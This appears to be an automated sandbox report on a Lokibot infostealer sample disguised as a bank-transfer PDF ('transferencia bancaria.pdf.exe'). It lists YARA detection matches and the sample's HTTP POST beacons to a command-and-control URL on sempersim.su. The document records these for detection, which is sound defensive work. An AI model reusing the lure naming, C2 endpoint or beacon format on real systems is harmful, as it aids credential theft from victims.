                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: transferencia bancaria.pdf.exe, 00000001.00000002.513374760.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://sempersim.su/gl21/fre.php
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: unknownHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 196Connection: close
                  Source: unknownDNS traffic detected: queries for: sempersim.su

                  System Summary

                  barindex
                  Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
                  Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000001.00000000.275125166.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: Process Memory Space: transferencia bancaria.pdf.exe PID: 5228, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: initial sampleStatic PE information: Filename: transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
                  Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000001.00000000.275125166.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
